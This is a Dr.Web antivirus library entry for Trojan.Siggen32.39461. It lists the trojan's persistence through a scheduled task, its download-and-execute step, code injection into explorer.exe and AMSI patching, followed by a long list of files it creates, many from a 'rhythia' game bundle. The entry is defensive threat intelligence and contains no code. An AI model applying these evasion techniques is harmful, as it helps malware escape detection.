ПОЛЬЗОВАТЕЛЯМ

Закрыть

Поиск

Поиск

Поддержка
Круглосуточная поддержка

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Напишите

Задать вопрос в поддержку

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

BY

RU CN EN ES FR IT JP KZ UZ BY ID
Закрыть
Сервисы
Сканеры
Dr.Web vxCube
Демо
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

Trojan.Siggen32.39461

Добавлен в вирусную базу Dr.Web: 2026-05-07

Описание добавлено:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • <SYSTEM32>\tasks\applicationbackup
Malicious functions
Creates and executes the following
  • '<Full path to file>' (downloaded from the Internet)
Injects code into
the following system processes:
  • %WINDIR%\explorer.exe
Patches code
in AMSI dll
  • explorer.exe process, Amsi.dll module
Modifies file system
Creates the following files
  • C:\users\public\rhythia.bat
  • C:\users\public\rhythialauncher.exe
  • C:\users\public\rhythia.zip
  • %ALLUSERSPROFILE%\inteldriver\regx.cmd
  • %HOMEPATH%\downloads\cpu.exe
  • %TEMP%\__psscriptpolicytest_cj5emcqf.grq.ps1
  • %TEMP%\__psscriptpolicytest_uvdb1k1n.xx1.psm1
  • %TEMP%\content\3976-4616-cpu.exe-13-50-45-471.dump
  • %TEMP%\content\3976-4616-cpu.exe-13-50-45-745.dump
  • %TEMP%\content\3976-4616-cpu.exe-13-50-45-821.dump
  • %TEMP%\content\3976-4616-cpu.exe-13-50-45-961.dump
  • %ALLUSERSPROFILE%\inteldriver\icon.png
  • %TEMP%\content\3976-4616-cpu.exe-13-50-46-255.dump
  • %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\cpu.exe.log
  • %TEMP%\__psscriptpolicytest_nm5xwyrg.ivt.ps1
  • %TEMP%\__psscriptpolicytest_nctydgxd.fdv.psm1
  • %TEMP%\content\4460-3172-cpu.exe-13-50-47-753.dump
  • %TEMP%\content\4460-3172-cpu.exe-13-50-48-020.dump
  • %TEMP%\content\4460-3172-cpu.exe-13-50-48-089.dump
  • %TEMP%\content\4460-3172-cpu.exe-13-50-48-223.dump
  • %ALLUSERSPROFILE%\inteldriver\logo.jpg
  • %TEMP%\content\4460-3172-cpu.exe-13-50-48-405.dump
  • %TEMP%\__psscriptpolicytest_q5vwksro.qet.ps1
  • %TEMP%\__psscriptpolicytest_yfb4lofo.kd0.psm1
  • %TEMP%\content\2488-3956-cpu.exe-13-50-49-904.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-50-151.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-50-230.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-50-453.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-031.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-127.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-184.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-413.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-433.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-485.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-487.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-495.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-497.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-509.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-520.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-529.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-531.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-539.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-776.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-807.dump
  • %TEMP%\__psscriptpolicytest_5jqpxf4s.i5x.ps1
  • %TEMP%\__psscriptpolicytest_nfcv3ga2.svo.psm1
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-932.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-51-951.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-52-017.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-52-059.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-52-067.dump
  • %TEMP%\content\2488-3956-cpu.exe-13-50-52-070.dump
  • %APPDATA%\applicationbackup.xml
  • %LOCALAPPDATA%\applicationbackup.vbs
  • %TEMP%\content\2488-3956-cpu.exe-13-50-52-847.dump
  • C:\users\public\rhythia-online\rhythia-online\avcodec-60.dll
  • C:\users\public\rhythia-online\rhythia-online\avfilter-9.dll
  • C:\users\public\rhythia-online\rhythia-online\avformat-60.dll
  • C:\users\public\rhythia-online\rhythia-online\avutil-58.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\clretwrc.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\clrgc.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\clrgcexp.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\clrjit.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\coreclr.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\createdump.exe
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\discordrpc.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\e_sqlite3.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\godotsharp.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\hostfxr.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\hostpolicy.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\microsoft.csharp.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\microsoft.diasymreader.native.amd64.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\microsoft.extensions.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\microsoft.visualbasic.core.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\microsoft.visualbasic.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\microsoft.win32.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\microsoft.win32.registry.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\mscordaccore.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\mscordaccore_amd64_amd64_10.0.25.52411.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\mscordbi.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\mscorlib.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\mscorrc.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\msquic.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\netstandard.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\newtonsoft.json.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\octokit.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\rhythia.deps.json
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\rhythia.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\rhythia.pdb
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\rhythia.runtimeconfig.json
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\semver.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\sqlite-net.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\sqlitepclraw.batteries_v2.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\sqlitepclraw.core.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\sqlitepclraw.provider.e_sqlite3.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.appcontext.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.buffers.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.collections.concurrent.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.collections.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.collections.immutable.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.collections.nongeneric.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.collections.specialized.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.componentmodel.annotations.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.componentmodel.dataannotations.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.componentmodel.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.componentmodel.eventbasedasync.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.componentmodel.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.componentmodel.typeconverter.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.configuration.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.console.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.core.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.data.common.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.data.datasetextensions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.data.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.contracts.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.debug.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.diagnosticsource.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.fileversioninfo.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.process.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.stacktrace.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.textwritertracelistener.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.tools.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.tracesource.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.diagnostics.tracing.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.drawing.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.drawing.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.dynamic.runtime.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.formats.asn1.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.formats.tar.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.globalization.calendars.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.globalization.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.globalization.extensions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.compression.brotli.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.compression.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.compression.filesystem.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.compression.native.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.compression.zipfile.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.filesystem.accesscontrol.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.filesystem.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.filesystem.driveinfo.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.filesystem.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.filesystem.watcher.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.isolatedstorage.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.memorymappedfiles.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.pipelines.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.pipes.accesscontrol.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.pipes.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.io.unmanagedmemorystream.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.linq.asyncenumerable.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.linq.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.linq.expressions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.linq.parallel.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.linq.queryable.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.memory.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.http.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.http.json.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.httplistener.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.mail.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.nameresolution.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.networkinformation.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.ping.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.quic.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.requests.dll
  • %LOCALAPPDATA%\microsoft\windows\powershell\moduleanalysiscache
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.security.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.serversentevents.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.servicepoint.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.sockets.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.webclient.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.webheadercollection.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.webproxy.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.websockets.client.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.net.websockets.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.numerics.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.numerics.vectors.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.objectmodel.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.private.corelib.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.private.datacontractserialization.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.private.uri.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.private.xml.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.private.xml.linq.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.dispatchproxy.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.emit.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.emit.ilgeneration.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.emit.lightweight.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.extensions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.metadata.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.reflection.typeextensions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.resources.reader.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.resources.resourcemanager.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.resources.writer.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.compilerservices.unsafe.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.compilerservices.visualc.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.extensions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.handles.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.interopservices.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.interopservices.javascript.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.interopservices.runtimeinformation.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.intrinsics.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.loader.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.numerics.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.serialization.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.serialization.formatters.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.serialization.json.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.serialization.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.runtime.serialization.xml.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.accesscontrol.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.claims.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.algorithms.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.cng.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.csp.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.encoding.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.openssl.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.primitives.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.cryptography.x509certificates.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.principal.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.principal.windows.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.security.securestring.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.servicemodel.web.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.serviceprocess.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.text.encoding.codepages.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.text.encoding.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.text.encoding.extensions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.text.encodings.web.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.text.json.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.text.regularexpressions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.accesscontrol.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.channels.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.overlapped.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.tasks.dataflow.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.tasks.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.tasks.extensions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.tasks.parallel.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.thread.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.threadpool.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.threading.timer.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.transactions.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.transactions.local.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.valuetuple.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.web.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.web.httputility.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.windows.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.linq.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.readerwriter.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.serialization.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.xdocument.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.xmldocument.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.xmlserializer.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.xpath.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\system.xml.xpath.xdocument.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\tomlyn.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\updatum.dll
  • C:\users\public\rhythia-online\rhythia-online\data_rhythia_windows_x86_64\windowsbase.dll
  • C:\users\public\rhythia-online\rhythia-online\libgdffmpeg.windows.template_debug.x86_64.dll
  • C:\users\public\rhythia-online\rhythia-online\rhythia.console.exe
  • C:\users\public\rhythia-online\rhythia-online\rhythia.exe
  • C:\users\public\rhythia-online\rhythia-online\swresample-4.dll
  • C:\users\public\rhythia-online\rhythia-online\swscale-7.dll
  • %HOMEPATH%\desktop\rhythia.lnk
  • %APPDATA%\rhythia\logs\godot.log
  • %LOCALAPPDATA%\d3dscache\bde57fe73734ae8b\f4eb2d6c-ed2b-4bdd-ad9d-f913287e6768.idx
  • %APPDATA%\rhythia\shader_cache\canvassdfshaderrd\0ee98c1c762a031ed5d6ae15569aac5493df641046733f2bdfb3a50df1f4154d\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\skeletonshaderrd\b807701246eba2e5b805fc0e7ba7b175f6b6d09a9e37d9e4cf9457567e5b8692\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sortshaderrd\5f7b2ec9b49f6ba75e1d03ef4dfdbfad8d55d693fa2c7cb5bc6e761cb986a8e5\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\particlesshaderrd\48be2fd5ec149691044dab9a7783b80a4ec194c46b14e88e6cb21540ec8f681c\f128cab0b22fb7e0d9f023d6cdb81309be392d95.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\particlescopyshaderrd\e1ec2b862158669cdd5f5cfa489962a45b22a1d170a38418ac800c5944f38061\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\canvasshaderrd\275d4d34e3615bf0802f2ef82109d1cde17c7aa8031e89154c70fc7b3d40d52f\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\canvasocclusionshaderrd\9a7b08184c03a1ecd0f1635a548165ea1b8977af20bdcc6026754dc923445089\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\clusterrendershaderrd\ce0a20efd77f533c88098581f42714bacac9fff0dd087f4452f4e090a2f1126d\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\clusterstoreshaderrd\f369908042729ae25ea308b7b8d34547e53e21278e78f6ef3fba410d908cb3d9\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\clusterdebugshaderrd\cf9e7f6b32d31ae8694758a95663a7c9fab66d2cdbc6bbfbfbdc73a452409cb7\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sceneforwardclusteredshaderrd\ddf71e2b0a93f8f42fc8827ef66052f76ea3654cfcd999e621135fc1399a5a79\a38af1e47720abf30ca44f3d3c099c07b046df81.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\bestfitnormalshaderrd\4e9da474dc84bf7827216c55a5ccbd80d5194c12c1c41eb2f67d659c3d7b5d11\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\integratedfgshaderrd\7049a4978dbea673146c24a42476293190f9806f2c1c73e26f6548a09d9f09d1\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\taaresolveshaderrd\8470bc598ece1480705c4d97217aed576067ef39813f3e16506ad87fcedc44e2\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sseffectsdownsampleshaderrd\9b03fd7cbef33949b738847086d7bd7ff6c796ec877d4d57e9c0b0f078d6ab26\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\ssilshaderrd\0c54181813ac355caa336bd64f0d15b67563cb80589a0ad2ac890813bf2e3c86\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
